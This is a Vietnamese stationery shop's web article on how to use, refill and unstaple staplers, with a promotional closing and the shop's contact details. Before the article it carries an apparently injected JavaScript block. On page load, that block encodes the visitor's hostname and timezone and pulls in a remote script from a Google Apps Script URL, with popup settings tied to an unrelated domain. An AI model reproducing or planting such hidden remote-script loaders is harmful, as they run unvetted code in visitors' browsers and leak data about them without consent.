var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tổng hợp cách thay ghim bấm deli [Hot Nhất 2023]

Ghim bấm giấy là vật dụng rất phổ biến trong học tập, công việc văn phòng. Ghim bấm phục vụ nhu cầu ghim bấm tài liệu, bấm vở, các giấy tờ cần xếp lại với nhau,… Ở bài viết này, văn phòng phẩm 247 sẽ hướng dẫn các bạn cách lắp ghim bấm giấy đơn giản, hiệu quả nhất giúp dễ dàng sử dụng hơn.

Những ứng dụng tuyệt vời của ghim bấm giấy

Trước đây, khi chưa có những chiếc ghim bấm giấy như bây giờ. Chúng ta thường chỉ xếp gọn những tờ giấy nháp và cố định chúng một cách đơn sơ bằng những sợi chỉ để tạo thành một quyển nháp nhỏ gọn.

Đến ngày nay, khi xuất hiện những chiếc ghim bấm diệu kỳ đã giúp ích rất nhiều cho các công việc văn phòng và học tập. Bạn chỉ cần bỏ ra một số tiền chỉ bằng một bữa ăn sáng là đã có thể mua được một chiếc ghim bấm giấy, không chỉ có hiệu quả sử dụng rất tốt mà còn được tặng kèm với kim bấm thì còn điều gì tuyệt hơn.

Thay vì bạn để những đống tài liệu lộn xộn gây mất thẩm mỹ. Những tờ giấy trắng không sử dụng đến thì bạn hoàn toàn có thể ghim chúng lại thành một khối với nhau bằng chiếc ghim bấm.

Khi bạn ghim những vật phẩm lộn xộn lại với nhau. Các bạn sẽ thấy bàn làm việc, góc học tập của mình sẽ trở nên gọn gàng hơn. Nếu như trước khi ghim bạn không muốn sử dụng những vật phẩm đó thì sau khi ghim gọn gàng lại bạn sẽ rất muốn sử dụng nó đó.

Ngoài những ứng dụng trên ghim bấm còn có một số công dụng khác như:

Giúp làm gọn tai nghe, dây sạc

Các loại tai nghe, dây sạc nếu bảo quản không tốt thì phần dây rất dễ bị rối. Các bạn sẽ phải mất khá nhiều thời gian để gỡ phần dây này ra. Tuy nhiên, nếu nhà các bạn đang có sẵn ghim bấm thì có thể làm theo những cách sau để sắp xếp các loại dây gọn gàng với nhau.

  • Đầu tiên, các bạn dùng một sợi dây chun và cột vào chiếc ghim bấm giấy.
  • Sau đó, bạn gấp dây tai nghe, dây sạc sao cho gọn rồi quấn sợi dây chun vài vòng. Cuối cùng, bạn móc chiếc dây chun vào kim bấm giấy là xong. Bằng cách này thì khi tháo ra sẽ đơn giản hơn rất nhiều so với việc dùng chun buộc.

Sắp xếp giấy tờ gọn gàng

Bạn có nhiều tờ giấy A4 nhưng không có dụng cụ để ghép các tờ giấy vào với nhau. Hoặc xấp giấy quá dày không thể dùng kẹp giấy như bình thường được thì hãy dùng ghim bấm theo cách sau.

  • Bạn cũng dùng một sợi dây chun và cột vào ghim bấm giấy sao cho chặt. Sau đó bạn tạo hai lỗ tròn trên đầu tập giấy rồi luồn ghim bấm giấy qua. Sau khi đã luồn ghim bấm giấy qua hai lỗ tròn thì các bạn dùng chun móc vào kẹp giấy cho chặt là xong. Bằng mẹo nhỏ này thì các bạn có thể ghép thêm bao nhiêu tờ giấy vào cũng được. Và đến khi cần lấy một tờ giấy ra cũng sẽ dễ dàng hơn.

Cách sử dụng ghim bấm giấy đơn giản nhất

Ghim bấm giấy là vật dụng văn phòng phẩm phù hợp với mọi lứa tuổi sử dụng. Học sinh có thể sử dụng ghim bấm để sắp xếp lại tài liệu, sách vở cho gọn gàng. Nhân viên văn phòng sử dụng ghim bấm để sắp xếp lại các giấy tờ của công ty, hóa đơn, phiếu thu chi,…

Việc đầu tiên bạn cần phải làm là phải chọn mua cho bản thân những chiếc ghim bấm có chất lượng thật tốt bởi chúng sẽ sử dụng được lâu dài, tránh mua những sản phẩm ghim bấm rẻ tiền bằng nhựa bởi khi ghim chúng ta sẽ tác động mạnh làm cho ghim bấm dễ bị vỡ, nhanh hỏng.

Sau khi bạn sở hữu được những chiếc ghim bấm giấy chất lượng rồi. Hãy sắp xếp tất cả những giấy tờ cùng một loại thật gọn gàng.

Tùy vào kích cỡ ghim bấm mà chúng ta có thể ghim được số lượng giấy nhiều hay ít. Cho giấy vào khe kẹp của ghim bấm, liên tục di chuyển đến những vị trí cần ghim lại.

Nếu bạn lỡ tay bấm nhầm chỗ, bạn vẫn có thể dễ dàng tháo kim bấm ra và ghim bấm lại bình thường mà không sợ giấy bị rách. Ngoài ra chúng ta có thể dễ dàng thay thế kim bấm khi sử dụng hết ghim. Dấu hiệu nhận biết ghim đã hết chính là không ra kim bấm khi bấm ghim nữa.

Cách thay và cách lắp ghim bấm giấy nhanh chóng

Nếu các bạn đang sử dụng ghim bấm mà không thấy kim bấm ra nữa thì bạn cần phải kiểm tra xem kim bấm ở trong chiếc ghim còn không, kim bấm có đang bị mắc không bởi vì số lượng kim bấm trong một thanh kim khá hạn chế nên bạn cần phải thường xuyên thay kim.

Cách kiểm tra ghim bấm giấy

Kim bấm nó cũng có nhiều loại kích cỡ khác nhau như kim bấm số 3, kim bấm số 10,… Đa số hiện nay các ghim bấm thường sử dụng kim bấm số 10 bởi sự nhỏ gọn và thuận tiện của nó cho các loại ghim bấm cỡ nhỏ.

Điều mà các bạn cần thực hiện lúc này đó chính là mở ghim bấm ra. Nếu thấy kim bấm bị mắc thì lấy phần kim bị mắc ra và sử dụng bình thường cho đến khi hết kim. Còn nếu thấy kim bấm hết rồi thì lắp kim bấm mới vào và tiếp tục sử dụng.

Cách lắp ghim bấm giấy

Các bạn cần dùng lực tay mạnh để tách ghim bấm ra từ phía đầu ghim. Sau khi tách ghim bấm ra các bạn dùng tay kéo phần lò xo bên trong ghim bấm xuống. Giữ nguyên tay kéo lò xo đồng thời lấy kim bấm mới cho vào khay đựng kim của ghim bấm.

Lưu ý với cách lắp ghim bấm này các bạn nhớ úp mặt kim xuống khay chứa. Không được đặt kim bấm ngửa lên vì khi đặt ngửa kim sẽ không bấm được và dễ hỏng ghim bấm. Các bạn nên mua kim bấm phù hợp với kích thước của loại ghim bấm đó. Nếu kim bấm nhỏ lớn hay lớn hơn so với ghim bấm đều sẽ không ghim được.

Bước cuối cùng trong cách lắp ghim bấm là bạn dùng tay bấm mạnh ghim lại. Như thế là bạn đã có thể sử dụng ghim để bấm giấy, ghim tài liệu như bình thường rồi. Rất đơn giản phải không nào!

Cách loại bỏ ghim bấm giấy

Để lấy ghim ra khỏi một tập giấy không phải là một việc khó. Tuy nhiên làm sao để sau khi lấy ghim ra mà phần giấy vẫn được phẳng, đẹp thì các bạn cần sử dụng một chút mẹo gỡ ghim bấm chuẩn.

Gỡ ghim với cấu tạo ghim bấm có sẵn

Một số ghim bấm hiện nay được thiết kế đầu gỡ ghim nằm trên thân. Đó là phần đuôi cong được thiết kế uốn lượn ra phía sau, phần đầu dẹp và dày hơn ở phía trong. Để tháo ghim bấm khi dùng sai, các bạn chỉ cần sử dụng phần đuôi này của ghim bấm luồn qua mặt trên của kim, hai tay cố định lấy hai mép giấy cạnh hai đầu ghim. Sau đó dùng lực kéo bật kim bấm lên theo hướng đầu của đầu gỡ. Vậy là các bạn đã có thể gỡ được ghim bấm một cách dễ dàng.

Gỡ ghim bằng dụng cụ chuyên dụng

Tháo ghim là dụng cụ chuyên dụng được sử dụng trong việc xử lý các vấn đề đến từ lỗi bấm ghim sai. Nó được thiết kế với cấu tạo đơn giản khá giống với dập ghim nhưng có kích thước nhỏ hơn. Đầu dập ghim được thiết kế với hai cặp đường thẳng song song, và có mũi nhọn ở mỗi mặt (được gọi là vuốt nhọn).

Để gỡ ghim bấm cho tài liệu, các bạn đưa đầu dụng cụ sao cho phần ghim cần gỡ nằm giữa hai cặp vuốt. Cuối dùng dùng ngón tay bóp nhẹ phần vuốt. Ngay lập tức phần kim loại của mảnh kim bấm sẽ bung ra như ý muốn. Ngoài ra, nếu dụng cụ gỡ ghim gặp khó khăn với những xấp tài liệu quá dày. Hãy làm theo cách sau: lật mặt trong của ghim bấm, dùng dụng cụ tháo ghim gỡ từng phần phía sau của tập giấy rồi lặp lại các bước gỡ ghim thông thường.

Văn phòng 247 – địa chỉ cung cấp ghim bấm uy tín tại Hà Nội

Bạn nên mua các sản phẩm ghim bấm có nguồn gốc và xuất xứ rõ ràng để đảm bảo mua về những sản phẩm có chất lượng thật tốt. Tránh mua hàng nhựa của Trung Quốc. Hãy chọn những sản phẩm ghim bấm được làm bằng sắt như hàng của Việt, Thái,…

Những sản phẩm có giá cao hơn một chút nhưng với chất lượng tốt các bạn hoàn toàn có thể sử dụng được lâu dài còn hơn là bạn mua hàng giá rẻ nhưng chỉ sử dụng được một thời gian ngắn đã phải thay cái mới vì hỏng.

Một trong những địa chỉ cung cấp các loại ghim bấm giấy được nhiều người tin tưởng lựa chọn nhất hiện nay chính là văn phòng phẩm 247. Đơn vị tự hào là địa chỉ cung cấp các sản phẩm đồ dùng văn phòng phẩm chất lượng cao. Sản phẩm được nhập khẩu trực tiếp từ nước ngoài hoặc các đơn vị sản xuất. Chính vì thế mức báo giá các loại ghim bấm tại đơn vị này luôn ưu đãi hơn các đơn vị khác, giúp người dùng tiết kiệm được tối đa chi phí.

Văn phòng phẩm 247 là đơn vị đã hoạt động lâu năm về lĩnh vực văn phòng phẩm. Chuyên cung cấp các sản phẩm có chất lượng tốt nhất, rõ nguồn gốc xuất xứ. Tại văn phòng phẩm 247 đang có sẵn rất nhiều loại ghim bấm giấy với đầy đủ màu sắc, mẫu mã đa dạng và đặc biệt có bán kèm theo kim bấm phù hợp với từng loại ghim khi các bạn có nhu cầu mua hàng với số lượng lớn.

Thông tin liên hệ:

  • Địa chỉ văn phòng phẩm 247: số nhà 31, Ngõ 89, Lê Đức Thọ, Mỹ Đình 2, Q. Nam Từ Liêm, Thành phố Hà Nội.
  • Số điện thoại liên hệ: 024.3201.3566
  • Số điện thoại Zalo: 0912.939.247
  • Website: https://vanphongpham247.vn/

Kết luận

Qua bài viết trên đây văn phòng phẩm 247 đã tổng hợp cho các bạn tất cả những thông tin về cách lắp ghim bấm giấy và cách sử dụng loại thiết bị này. Hy vọng với những thông tin chúng tôi đã cung cấp sẽ giúp các bạn sẽ chọn được cho mình một địa chỉ uy tín để tìm mua những sản phẩm chất lượng nhất. Đừng quên theo dõi trang web của chúng tôi để trở thành người cập nhập nhanh nhất những mẫu sản phẩm mới nhất nhé.